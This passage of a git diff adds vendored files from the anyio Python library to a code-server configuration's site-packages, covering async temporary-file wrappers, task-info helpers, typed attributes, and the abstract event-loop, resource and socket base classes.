type: ignore[arg-type] + else: + super().__init__( + TextIOWrapper( # type: ignore[arg-type] + BytesIO(), + encoding=encoding, + errors=errors, + newline=newline, + write_through=True, + ) + ) + + async def aclose(self) -> None: + if not self._rolled: + self._fp.close() + return + + await super().aclose() + + async def _check(self) -> None: + if self._rolled or self._fp.tell() <= self._max_size: + return + + await self.rollover() + + async def rollover(self) -> None: + if self._rolled: + return + + self._rolled = True + buffer = self._fp + buffer.seek(0) + self._fp = await to_thread.run_sync( + lambda: tempfile.TemporaryFile(**self._tempfile_params) + ) + await self.write(buffer.read()) + buffer.close() + + @property + def closed(self) -> bool: + return self._fp.closed + + async def read(self, size: int = -1) -> AnyStr: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.read(size) + + return await super().read(size) # type: ignore[return-value] + + async def read1(self: SpooledTemporaryFile[bytes], size: int = -1) -> bytes: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.read1(size) + + return await super().read1(size) + + async def readline(self) -> AnyStr: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.readline() + + return await super().readline() # type: ignore[return-value] + + async def readlines(self) -> list[AnyStr]: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.readlines() + + return await super().readlines() # type: ignore[return-value] + + async def readinto(self: SpooledTemporaryFile[bytes], b: WriteableBuffer) -> int: + if not self._rolled: + await checkpoint_if_cancelled() + self._fp.readinto(b) + + return await super().readinto(b) + + async def readinto1(self: SpooledTemporaryFile[bytes], b: WriteableBuffer) -> int: + if not self._rolled: + await checkpoint_if_cancelled() + self._fp.readinto(b) + + return await super().readinto1(b) + + async def seek(self, offset: int, whence: int | None = os.SEEK_SET) -> int: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.seek(offset, whence) + + return await super().seek(offset, whence) + + async def tell(self) -> int: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.tell() + + return await super().tell() + + async def truncate(self, size: int | None = None) -> int: + if not self._rolled: + await checkpoint_if_cancelled() + return self._fp.truncate(size) + + return await super().truncate(size) + + @overload + async def write(self: SpooledTemporaryFile[bytes], b: ReadableBuffer) -> int: ... + @overload + async def write(self: SpooledTemporaryFile[str], b: str) -> int: ... + + async def write(self, b: ReadableBuffer | str) -> int: + """ + Asynchronously write data to the spooled temporary file. + + If the file has not yet been rolled over, the data is written synchronously, + and a rollover is triggered if the size exceeds the maximum size. + + :param s: The data to write. + :return: The number of bytes written. + :raises RuntimeError: If the underlying file is not initialized. + + """ + if not self._rolled: + await checkpoint_if_cancelled() + result = self._fp.write(b) + await self._check() + return result + + return await super().write(b) # type: ignore[misc] + + @overload + async def writelines( + self: SpooledTemporaryFile[bytes], lines: Iterable[ReadableBuffer] + ) -> None: ... + @overload + async def writelines( + self: SpooledTemporaryFile[str], lines: Iterable[str] + ) -> None: ... + + async def writelines(self, lines: Iterable[str] | Iterable[ReadableBuffer]) -> None: + """ + Asynchronously write a list of lines to the spooled temporary file. + + If the file has not yet been rolled over, the lines are written synchronously, + and a rollover is triggered if the size exceeds the maximum size. + + :param lines: An iterable of lines to write. + :raises RuntimeError: If the underlying file is not initialized. + + """ + if not self._rolled: + await checkpoint_if_cancelled() + result = self._fp.writelines(lines) + await self._check() + return result + + return await super().writelines(lines) # type: ignore[misc] + + +class TemporaryDirectory(Generic[AnyStr]): + """ + An asynchronous temporary directory that is created and cleaned up automatically. + + This class provides an asynchronous context manager for creating a temporary + directory. It wraps Python's standard :class:`~tempfile.TemporaryDirectory` to + perform directory creation and cleanup operations in a background thread. + + :param suffix: Suffix to be added to the temporary directory name. + :param prefix: Prefix to be added to the temporary directory name. + :param dir: The parent directory where the temporary directory is created. + :param ignore_cleanup_errors: Whether to ignore errors during cleanup + (Python 3.10+). + :param delete: Whether to delete the directory upon closing (Python 3.12+). + """ + + def __init__( + self, + suffix: AnyStr | None = None, + prefix: AnyStr | None = None, + dir: AnyStr | None = None, + *, + ignore_cleanup_errors: bool = False, + delete: bool = True, + ) -> None: + self.suffix: AnyStr | None = suffix + self.prefix: AnyStr | None = prefix + self.dir: AnyStr | None = dir + self.ignore_cleanup_errors = ignore_cleanup_errors + self.delete = delete + + self._tempdir: tempfile.TemporaryDirectory | None = None + + async def __aenter__(self) -> str: + params: dict[str, Any] = { + "suffix": self.suffix, + "prefix": self.prefix, + "dir": self.dir, + } + if sys.version_info >= (3, 10): + params["ignore_cleanup_errors"] = self.ignore_cleanup_errors + + if sys.version_info >= (3, 12): + params["delete"] = self.delete + + self._tempdir = await to_thread.run_sync( + lambda: tempfile.TemporaryDirectory(**params) + ) + return await to_thread.run_sync(self._tempdir.__enter__) + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_value: BaseException | None, + traceback: TracebackType | None, + ) -> None: + if self._tempdir is not None: + await to_thread.run_sync( + self._tempdir.__exit__, exc_type, exc_value, traceback + ) + + async def cleanup(self) -> None: + if self._tempdir is not None: + await to_thread.run_sync(self._tempdir.cleanup) + + +@overload +async def mkstemp( + suffix: str | None = None, + prefix: str | None = None, + dir: str | None = None, + text: bool = False, +) -> tuple[int, str]: ... + + +@overload +async def mkstemp( + suffix: bytes | None = None, + prefix: bytes | None = None, + dir: bytes | None = None, + text: bool = False, +) -> tuple[int, bytes]: ... + + +async def mkstemp( + suffix: AnyStr | None = None, + prefix: AnyStr | None = None, + dir: AnyStr | None = None, + text: bool = False, +) -> tuple[int, str | bytes]: + """ + Asynchronously create a temporary file and return an OS-level handle and the file + name. + + This function wraps `tempfile.mkstemp` and executes it in a background thread. + + :param suffix: Suffix to be added to the file name. + :param prefix: Prefix to be added to the file name. + :param dir: Directory in which the temporary file is created. + :param text: Whether the file is opened in text mode. + :return: A tuple containing the file descriptor and the file name. + + """ + return await to_thread.run_sync(tempfile.mkstemp, suffix, prefix, dir, text) + + +@overload +async def mkdtemp( + suffix: str | None = None, + prefix: str | None = None, + dir: str | None = None, +) -> str: ... + + +@overload +async def mkdtemp( + suffix: bytes | None = None, + prefix: bytes | None = None, + dir: bytes | None = None, +) -> bytes: ... + + +async def mkdtemp( + suffix: AnyStr | None = None, + prefix: AnyStr | None = None, + dir: AnyStr | None = None, +) -> str | bytes: + """ + Asynchronously create a temporary directory and return its path. + + This function wraps `tempfile.mkdtemp` and executes it in a background thread. + + :param suffix: Suffix to be added to the directory name. + :param prefix: Prefix to be added to the directory name. + :param dir: Parent directory where the temporary directory is created. + :return: The path of the created temporary directory. + + """ + return await to_thread.run_sync(tempfile.mkdtemp, suffix, prefix, dir) + + +async def gettempdir() -> str: + """ + Asynchronously return the name of the directory used for temporary files. + + This function wraps `tempfile.gettempdir` and executes it in a background thread. + + :return: The path of the temporary directory as a string. + + """ + return await to_thread.run_sync(tempfile.gettempdir) + + +async def gettempdirb() -> bytes: + """ + Asynchronously return the name of the directory used for temporary files in bytes. + + This function wraps `tempfile.gettempdirb` and executes it in a background thread. + + :return: The path of the temporary directory as bytes. + + """ + return await to_thread.run_sync(tempfile.gettempdirb) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_testing.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_testing.py new file mode 100755 index 0000000..369e65c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_testing.py @@ -0,0 +1,82 @@ +from __future__ import annotations + +from collections.abc import Awaitable, Generator +from typing import Any, cast + +from ._eventloop import get_async_backend + + +class TaskInfo: + """ + Represents an asynchronous task. + + :ivar int id: the unique identifier of the task + :ivar parent_id: the identifier of the parent task, if any + :vartype parent_id: Optional[int] + :ivar str name: the description of the task (if any) + :ivar ~collections.abc.Coroutine coro: the coroutine object of the task + """ + + __slots__ = "_name", "id", "parent_id", "name", "coro" + + def __init__( + self, + id: int, + parent_id: int | None, + name: str | None, + coro: Generator[Any, Any, Any] | Awaitable[Any], + ): + func = get_current_task + self._name = f"{func.__module__}.{func.__qualname__}" + self.id: int = id + self.parent_id: int | None = parent_id + self.name: str | None = name + self.coro: Generator[Any, Any, Any] | Awaitable[Any] = coro + + def __eq__(self, other: object) -> bool: + if isinstance(other, TaskInfo): + return self.id == other.id + + return NotImplemented + + def __hash__(self) -> int: + return hash(self.id) + + def __repr__(self) -> str: + return f"{self.__class__.__name__}(id={self.id!r}, name={self.name!r})" + + def has_pending_cancellation(self) -> bool: + """ + Return ``True`` if the task has a cancellation pending, ``False`` otherwise. + + """ + return False + + +def get_current_task() -> TaskInfo: + """ + Return the current task. + + :return: a representation of the current task + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().get_current_task() + + +def get_running_tasks() -> list[TaskInfo]: + """ + Return a list of running tasks in the current event loop. + + :return: a list of task info objects + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return cast("list[TaskInfo]", get_async_backend().get_running_tasks()) + + +async def wait_all_tasks_blocked() -> None: + """Wait until all other tasks are waiting for something.""" + await get_async_backend().wait_all_tasks_blocked() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_typedattr.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_typedattr.py new file mode 100755 index 0000000..f358a44 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_typedattr.py @@ -0,0 +1,81 @@ +from __future__ import annotations + +from collections.abc import Callable, Mapping +from typing import Any, TypeVar, final, overload + +from ._exceptions import TypedAttributeLookupError + +T_Attr = TypeVar("T_Attr") +T_Default = TypeVar("T_Default") +undefined = object() + + +def typed_attribute() -> Any: + """Return a unique object, used to mark typed attributes.""" + return object() + + +class TypedAttributeSet: + """ + Superclass for typed attribute collections. + + Checks that every public attribute of every subclass has a type annotation. + """ + + def __init_subclass__(cls) -> None: + annotations: dict[str, Any] = getattr(cls, "__annotations__", {}) + for attrname in dir(cls): + if not attrname.startswith("_") and attrname not in annotations: + raise TypeError( + f"Attribute {attrname!r} is missing its type annotation" + ) + + super().__init_subclass__() + + +class TypedAttributeProvider: + """Base class for classes that wish to provide typed extra attributes.""" + + @property + def extra_attributes(self) -> Mapping[T_Attr, Callable[[], T_Attr]]: + """ + A mapping of the extra attributes to callables that return the corresponding + values. + + If the provider wraps another provider, the attributes from that wrapper should + also be included in the returned mapping (but the wrapper may override the + callables from the wrapped instance). + + """ + return {} + + @overload + def extra(self, attribute: T_Attr) -> T_Attr: ... + + @overload + def extra(self, attribute: T_Attr, default: T_Default) -> T_Attr | T_Default: ... + + @final + def extra(self, attribute: Any, default: object = undefined) -> object: + """ + extra(attribute, default=undefined) + + Return the value of the given typed extra attribute. + + :param attribute: the attribute (member of a :class:`~TypedAttributeSet`) to + look for + :param default: the value that should be returned if no value is found for the + attribute + :raises ~anyio.TypedAttributeLookupError: if the search failed and no default + value was given + + """ + try: + getter = self.extra_attributes[attribute] + except KeyError: + if default is undefined: + raise TypedAttributeLookupError("Attribute not found") from None + else: + return default + + return getter() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/__init__.py new file mode 100755 index 0000000..d560ce3 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/__init__.py @@ -0,0 +1,58 @@ +from __future__ import annotations + +from ._eventloop import AsyncBackend as AsyncBackend +from ._resources import AsyncResource as AsyncResource +from ._sockets import ConnectedUDPSocket as ConnectedUDPSocket +from ._sockets import ConnectedUNIXDatagramSocket as ConnectedUNIXDatagramSocket +from ._sockets import IPAddressType as IPAddressType +from ._sockets import IPSockAddrType as IPSockAddrType +from ._sockets import SocketAttribute as SocketAttribute +from ._sockets import SocketListener as SocketListener +from ._sockets import SocketStream as SocketStream +from ._sockets import UDPPacketType as UDPPacketType +from ._sockets import UDPSocket as UDPSocket +from ._sockets import UNIXDatagramPacketType as UNIXDatagramPacketType +from ._sockets import UNIXDatagramSocket as UNIXDatagramSocket +from ._sockets import UNIXSocketStream as UNIXSocketStream +from ._streams import AnyByteReceiveStream as AnyByteReceiveStream +from ._streams import AnyByteSendStream as AnyByteSendStream +from ._streams import AnyByteStream as AnyByteStream +from ._streams import AnyByteStreamConnectable as AnyByteStreamConnectable +from ._streams import AnyUnreliableByteReceiveStream as AnyUnreliableByteReceiveStream +from ._streams import AnyUnreliableByteSendStream as AnyUnreliableByteSendStream +from ._streams import AnyUnreliableByteStream as AnyUnreliableByteStream +from ._streams import ByteReceiveStream as ByteReceiveStream +from ._streams import ByteSendStream as ByteSendStream +from ._streams import ByteStream as ByteStream +from ._streams import ByteStreamConnectable as ByteStreamConnectable +from ._streams import Listener as Listener +from ._streams import ObjectReceiveStream as ObjectReceiveStream +from ._streams import ObjectSendStream as ObjectSendStream +from ._streams import ObjectStream as ObjectStream +from ._streams import ObjectStreamConnectable as ObjectStreamConnectable +from ._streams import UnreliableObjectReceiveStream as UnreliableObjectReceiveStream +from ._streams import UnreliableObjectSendStream as UnreliableObjectSendStream +from ._streams import UnreliableObjectStream as UnreliableObjectStream +from ._subprocesses import Process as Process +from ._tasks import TaskGroup as TaskGroup +from ._tasks import TaskStatus as TaskStatus +from ._testing import TestRunner as TestRunner + +# Re-exported here, for backwards compatibility +# isort: off +from .._core._synchronization import ( + CapacityLimiter as CapacityLimiter, + Condition as Condition, + Event as Event, + Lock as Lock, + Semaphore as Semaphore, +) +from .._core._tasks import CancelScope as CancelScope +from ..from_thread import BlockingPortal as BlockingPortal + +# Re-export imports so they look like they live directly in this package +for __value in list(locals().values()): + if getattr(__value, "__module__", "").startswith("anyio.abc."): + __value.__module__ = __name__ + +del __value diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_eventloop.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_eventloop.py new file mode 100755 index 0000000..b1bd085 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_eventloop.py @@ -0,0 +1,414 @@ +from __future__ import annotations + +import math +import sys +from abc import ABCMeta, abstractmethod +from collections.abc import AsyncIterator, Awaitable, Callable, Sequence +from contextlib import AbstractContextManager +from os import PathLike +from signal import Signals +from socket import AddressFamily, SocketKind, socket +from typing import ( + IO, + TYPE_CHECKING, + Any, + TypeVar, + Union, + overload, +) + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +if sys.version_info >= (3, 10): + from typing import TypeAlias +else: + from typing_extensions import TypeAlias + +if TYPE_CHECKING: + from _typeshed import FileDescriptorLike + + from .._core._synchronization import CapacityLimiter, Event, Lock, Semaphore + from .._core._tasks import CancelScope + from .._core._testing import TaskInfo + from ._sockets import ( + ConnectedUDPSocket, + ConnectedUNIXDatagramSocket, + IPSockAddrType, + SocketListener, + SocketStream, + UDPSocket, + UNIXDatagramSocket, + UNIXSocketStream, + ) + from ._subprocesses import Process + from ._tasks import TaskGroup + from ._testing import TestRunner + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") +StrOrBytesPath: TypeAlias = Union[str, bytes, "PathLike[str]", "PathLike[bytes]"] + + +class AsyncBackend(metaclass=ABCMeta): + @classmethod + @abstractmethod + def run( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + kwargs: dict[str, Any], + options: dict[str, Any], + ) -> T_Retval: + """ + Run the given coroutine function in an asynchronous event loop. + + The current thread must not be already running an event loop. + + :param func: a coroutine function + :param args: positional arguments to ``func`` + :param kwargs: positional arguments to ``func`` + :param options: keyword arguments to call the backend ``run()`` implementation + with + :return: the return value of the coroutine function + """ + + @classmethod + @abstractmethod + def current_token(cls) -> object: + """ + Return an object that allows other threads to run code inside the event loop. + + :return: a token object, specific to the event loop running in the current + thread + """ + + @classmethod + @abstractmethod + def current_time(cls) -> float: + """ + Return the current value of the event loop's internal clock. + + :return: the clock value (seconds) + """ + + @classmethod + @abstractmethod + def cancelled_exception_class(cls) -> type[BaseException]: + """Return the exception class that is raised in a task if it's cancelled.""" + + @classmethod + @abstractmethod + async def checkpoint(cls) -> None: + """ + Check if the task has been cancelled, and allow rescheduling of other tasks. + + This is effectively the same as running :meth:`checkpoint_if_cancelled` and then + :meth:`cancel_shielded_checkpoint`. + """ + + @classmethod + async def checkpoint_if_cancelled(cls) -> None: + """ + Check if the current task group has been cancelled. + + This will check if the task has been cancelled, but will not allow other tasks + to be scheduled if not. + + """ + if cls.current_effective_deadline() == -math.inf: + await cls.checkpoint() + + @classmethod + async def cancel_shielded_checkpoint(cls) -> None: + """ + Allow the rescheduling of other tasks. + + This will give other tasks the opportunity to run, but without checking if the + current task group has been cancelled, unlike with :meth:`checkpoint`. + + """ + with cls.create_cancel_scope(shield=True): + await cls.sleep(0) + + @classmethod + @abstractmethod + async def sleep(cls, delay: float) -> None: + """ + Pause the current task for the specified duration. + + :param delay: the duration, in seconds + """ + + @classmethod + @abstractmethod + def create_cancel_scope( + cls, *, deadline: float = math.inf, shield: bool = False + ) -> CancelScope: + pass + + @classmethod + @abstractmethod + def current_effective_deadline(cls) -> float: + """ + Return the nearest deadline among all the cancel scopes effective for the + current task. + + :return: + - a clock value from the event loop's internal clock + - ``inf`` if there is no deadline in effect + - ``-inf`` if the current scope has been cancelled + :rtype: float + """ + + @classmethod + @abstractmethod + def create_task_group(cls) -> TaskGroup: + pass + + @classmethod + @abstractmethod + def create_event(cls) -> Event: + pass + + @classmethod + @abstractmethod + def create_lock(cls, *, fast_acquire: bool) -> Lock: + pass + + @classmethod + @abstractmethod + def create_semaphore( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> Semaphore: + pass + + @classmethod + @abstractmethod + def create_capacity_limiter(cls, total_tokens: float) -> CapacityLimiter: + pass + + @classmethod + @abstractmethod + async def run_sync_in_worker_thread( + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + abandon_on_cancel: bool = False, + limiter: CapacityLimiter | None = None, + ) -> T_Retval: + pass + + @classmethod + @abstractmethod + def check_cancelled(cls) -> None: + pass + + @classmethod + @abstractmethod + def run_async_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + pass + + @classmethod + @abstractmethod + def run_sync_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + pass + + @classmethod + @abstractmethod + async def open_process( + cls, + command: StrOrBytesPath | Sequence[StrOrBytesPath], + *, + stdin: int | IO[Any] | None, + stdout: int | IO[Any] | None, + stderr: int | IO[Any] | None, + **kwargs: Any, + ) -> Process: + pass + + @classmethod + @abstractmethod + def setup_process_pool_exit_at_shutdown(cls, workers: set[Process]) -> None: + pass + + @classmethod + @abstractmethod + async def connect_tcp( + cls, host: str, port: int, local_address: IPSockAddrType | None = None + ) -> SocketStream: + pass + + @classmethod + @abstractmethod + async def connect_unix(cls, path: str | bytes) -> UNIXSocketStream: + pass + + @classmethod + @abstractmethod + def create_tcp_listener(cls, sock: socket) -> SocketListener: + pass + + @classmethod + @abstractmethod + def create_unix_listener(cls, sock: socket) -> SocketListener: + pass + + @classmethod + @abstractmethod + async def create_udp_socket( + cls, + family: AddressFamily, + local_address: IPSockAddrType | None, + remote_address: IPSockAddrType | None, + reuse_port: bool, + ) -> UDPSocket | ConnectedUDPSocket: + pass + + @classmethod + @overload + async def create_unix_datagram_socket( + cls, raw_socket: socket, remote_path: None + ) -> UNIXDatagramSocket: ... + + @classmethod + @overload + async def create_unix_datagram_socket( + cls, raw_socket: socket, remote_path: str | bytes + ) -> ConnectedUNIXDatagramSocket: ... + + @classmethod + @abstractmethod + async def create_unix_datagram_socket( + cls, raw_socket: socket, remote_path: str | bytes | None + ) -> UNIXDatagramSocket | ConnectedUNIXDatagramSocket: + pass + + @classmethod + @abstractmethod + async def getaddrinfo( + cls, + host: bytes | str | None, + port: str | int | None, + *, + family: int | AddressFamily = 0, + type: int | SocketKind = 0, + proto: int = 0, + flags: int = 0, + ) -> Sequence[ + tuple[ + AddressFamily, + SocketKind, + int, + str, + tuple[str, int] | tuple[str, int, int, int] | tuple[int, bytes], + ] + ]: + pass + + @classmethod + @abstractmethod + async def getnameinfo( + cls, sockaddr: IPSockAddrType, flags: int = 0 + ) -> tuple[str, str]: + pass + + @classmethod + @abstractmethod + async def wait_readable(cls, obj: FileDescriptorLike) -> None: + pass + + @classmethod + @abstractmethod + async def wait_writable(cls, obj: FileDescriptorLike) -> None: + pass + + @classmethod + @abstractmethod + def notify_closing(cls, obj: FileDescriptorLike) -> None: + pass + + @classmethod + @abstractmethod + async def wrap_listener_socket(cls, sock: socket) -> SocketListener: + pass + + @classmethod + @abstractmethod + async def wrap_stream_socket(cls, sock: socket) -> SocketStream: + pass + + @classmethod + @abstractmethod + async def wrap_unix_stream_socket(cls, sock: socket) -> UNIXSocketStream: + pass + + @classmethod + @abstractmethod + async def wrap_udp_socket(cls, sock: socket) -> UDPSocket: + pass + + @classmethod + @abstractmethod + async def wrap_connected_udp_socket(cls, sock: socket) -> ConnectedUDPSocket: + pass + + @classmethod + @abstractmethod + async def wrap_unix_datagram_socket(cls, sock: socket) -> UNIXDatagramSocket: + pass + + @classmethod + @abstractmethod + async def wrap_connected_unix_datagram_socket( + cls, sock: socket + ) -> ConnectedUNIXDatagramSocket: + pass + + @classmethod + @abstractmethod + def current_default_thread_limiter(cls) -> CapacityLimiter: + pass + + @classmethod + @abstractmethod + def open_signal_receiver( + cls, *signals: Signals + ) -> AbstractContextManager[AsyncIterator[Signals]]: + pass + + @classmethod + @abstractmethod + def get_current_task(cls) -> TaskInfo: + pass + + @classmethod + @abstractmethod + def get_running_tasks(cls) -> Sequence[TaskInfo]: + pass + + @classmethod + @abstractmethod + async def wait_all_tasks_blocked(cls) -> None: + pass + + @classmethod + @abstractmethod + def create_test_runner(cls, options: dict[str, Any]) -> TestRunner: + pass diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_resources.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_resources.py new file mode 100755 index 0000000..10df115 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_resources.py @@ -0,0 +1,33 @@ +from __future__ import annotations + +from abc import ABCMeta, abstractmethod +from types import TracebackType +from typing import TypeVar + +T = TypeVar("T") + + +class AsyncResource(metaclass=ABCMeta): + """ + Abstract base class for all closeable asynchronous resources. + + Works as an asynchronous context manager which returns the instance itself on enter, + and calls :meth:`aclose` on exit. + """ + + __slots__ = () + + async def __aenter__(self: T) -> T: + return self + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + await self.aclose() + + @abstractmethod + async def aclose(self) -> None: + """Close the resource.""" diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_sockets.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_sockets.py new file mode 100755 index 0000000..3ff60d4 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_sockets.py @@ -0,0 +1,405 @@ +from __future__ import annotations + +import errno +import socket +import sys +from abc import abstractmethod +from collections.abc import Callable, Collection, Mapping +from contextlib import AsyncExitStack +from io import IOBase +from ipaddress import IPv4Address, IPv6Address +from socket import AddressFamily +from typing import Any, TypeVar, Union + +from .._core._eventloop import get_async_backend +from .._core._typedattr import ( + TypedAttributeProvider, + TypedAttributeSet, + typed_attribute, +) +from ._streams import ByteStream, Listener, UnreliableObjectStream +from ._tasks import TaskGroup + +if sys.version_info >= (3, 10): + from typing import TypeAlias +else: + from typing_extensions import TypeAlias + +IPAddressType: TypeAlias = Union[str, IPv4Address, IPv6Address] +IPSockAddrType: TypeAlias = tuple[str, int] +SockAddrType: TypeAlias = Union[IPSockAddrType, str] +UDPPacketType: TypeAlias = tuple[bytes, IPSockAddrType] +UNIXDatagramPacketType: TypeAlias = tuple[bytes, str] +T_Retval = TypeVar("T_Retval") + + +def _validate_socket( + sock_or_fd: socket.socket | int, + sock_type: socket.SocketKind, + addr_family: socket.AddressFamily = socket.AF_UNSPEC, + *, + require_connected: bool = False, + require_bound: bool = False, +) -> socket.socket: + if isinstance(sock_or_fd, int): + try: + sock = socket.socket(fileno=sock_or_fd) + except OSError as exc: + if exc.errno == errno.ENOTSOCK: + raise ValueError( + "the file descriptor does not refer to a socket" + ) from exc + elif require_connected: + raise ValueError("the socket must be connected") from exc + elif require_bound: + raise ValueError("the socket must be bound to a local address") from exc + else: + raise + elif isinstance(sock_or_fd, socket.socket): + sock = sock_or_fd + else: + raise TypeError( + f"expected an int or socket, got {type(sock_or_fd).__qualname__} instead" + ) + + try: + if require_connected: + try: + sock.getpeername() + except OSError as exc: + raise ValueError("the socket must be connected") from exc + + if require_bound: + try: + if sock.family in (socket.AF_INET, socket.AF_INET6): + bound_addr = sock.getsockname()[1] + else: + bound_addr = sock.getsockname() + except OSError: + bound_addr = None + + if not bound_addr: + raise ValueError("the socket must be bound to a local address") + + if addr_family != socket.AF_UNSPEC and sock.family != addr_family: + raise ValueError( + f"address family mismatch: expected {addr_family.name}, got " + f"{sock.family.name}" + ) + + if sock.type != sock_type: + raise ValueError( + f"socket type mismatch: expected {sock_type.name}, got {sock.type.name}" + ) + except BaseException: + # Avoid ResourceWarning from the locally constructed socket object + if isinstance(sock_or_fd, int): + sock.detach() + + raise + + sock.setblocking(False) + return sock + + +class SocketAttribute(TypedAttributeSet): + """ + .. attribute:: family + :type: socket.AddressFamily + + the address family of the underlying socket + + .. attribute:: local_address + :type: tuple[str, int] | str + + the local address the underlying socket is connected to + + .. attribute:: local_port + :type: int + + for IP based sockets, the local port the underlying socket is bound to + + .. attribute:: raw_socket + :type: socket.socket + + the underlying stdlib socket object + + .. attribute:: remote_address + :type: tuple[str, int] | str + + the remote address the underlying socket is connected to + + .. attribute:: remote_port + :type: int + + for IP based sockets, the remote port the underlying socket is connected to + """ + + family: AddressFamily = typed_attribute() + local_address: SockAddrType = typed_attribute() + local_port: int = typed_attribute() + raw_socket: socket.socket = typed_attribute() + remote_address: SockAddrType = typed_attribute() + remote_port: int = typed_attribute() + + +class _SocketProvider(TypedAttributeProvider): + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + from .._core._sockets import convert_ipv6_sockaddr as convert + + attributes: dict[Any, Callable[[], Any]] = { + SocketAttribute.family: lambda: self._raw_socket.family, + SocketAttribute.local_address: lambda: convert( + self._raw_socket.getsockname() + ), + SocketAttribute.raw_socket: lambda: self._raw_socket, + } + try: + peername: tuple[str, int] | None = convert(self._raw_socket.getpeername()) + except OSError: + peername = None + + # Provide the remote address for connected sockets + if peername is not None: + attributes[SocketAttribute.remote_address] = lambda: peername + + # Provide local and remote ports for IP based sockets + if self._raw_socket.family in (AddressFamily.AF_INET, AddressFamily.AF_INET6): + attributes[SocketAttribute.local_port] = ( + lambda: self._raw_socket.getsockname()[1] + ) + if peername is not None: + remote_port = peername[1] + attributes[SocketAttribute.remote_port] = lambda: remote_port + + return attributes + + @property + @abstractmethod + def _raw_socket(self) -> socket.socket: + pass + + +class SocketStream(ByteStream, _SocketProvider): + """ + Transports bytes over a socket. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket(cls, sock_or_fd: socket.socket | int) -> SocketStream: + """ + Wrap an existing socket object or file descriptor as a socket stream. + + The newly created socket wrapper takes ownership of the socket being passed in. + The existing socket must already be connected. + + :param sock_or_fd: a socket object or file descriptor + :return: a socket stream + + """ + sock = _validate_socket(sock_or_fd, socket.SOCK_STREAM, require_connected=True) + return await get_async_backend().wrap_stream_socket(sock) + + +class UNIXSocketStream(SocketStream): + @classmethod + async def from_socket(cls, sock_or_fd: socket.socket | int) -> UNIXSocketStream: + """ + Wrap an existing socket object or file descriptor as a UNIX socket stream. + + The newly created socket wrapper takes ownership of the socket being passed in. + The existing socket must already be connected. + + :param sock_or_fd: a socket object or file descriptor + :return: a UNIX socket stream + + """ + sock = _validate_socket( + sock_or_fd, socket.SOCK_STREAM, socket.AF_UNIX, require_connected=True + ) + return await get_async_backend().wrap_unix_stream_socket(sock) + + @abstractmethod + async def send_fds(self, message: bytes, fds: Collection[int | IOBase]) -> None: + """ + Send file descriptors along with a message to the peer. + + :param message: a non-empty bytestring + :param fds: a collection of files (either numeric file descriptors or open file + or socket objects) + """ + + @abstractmethod + async def receive_fds(self, msglen: int, maxfds: int) -> tuple[bytes, list[int]]: + """ + Receive file descriptors along with a message from the peer. + + :param msglen: length of the message to expect from the peer + :param maxfds: maximum number of file descriptors to expect from the peer + :return: a tuple of (message, file descriptors) + """ + + +class SocketListener(Listener[SocketStream], _SocketProvider): + """ + Listens to incoming socket connections. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket( + cls, + sock_or_fd: socket.socket | int, + ) -> SocketListener: + """ + Wrap an existing socket object or file descriptor as a socket listener. + + The newly created listener takes ownership of the socket being passed in. + + :param sock_or_fd: a socket object or file descriptor + :return: a socket listener + + """ + sock = _validate_socket(sock_or_fd, socket.SOCK_STREAM, require_bound=True) + return await get_async_backend().wrap_listener_socket(sock) + + @abstractmethod + async def accept(self) -> SocketStream: + """Accept an incoming connection.""" + + async def serve( + self, + handler: Callable[[SocketStream], Any], + task_group: TaskGroup | None = None, + ) -> None: + from .. import create_task_group + + async with AsyncExitStack() as stack: + if task_group is None: + task_group = await stack.enter_async_context(create_task_group()) + + while True: + stream = await self.accept() + task_group.start_soon(handler, stream) + + +class UDPSocket(UnreliableObjectStream[UDPPacketType], _SocketProvider): 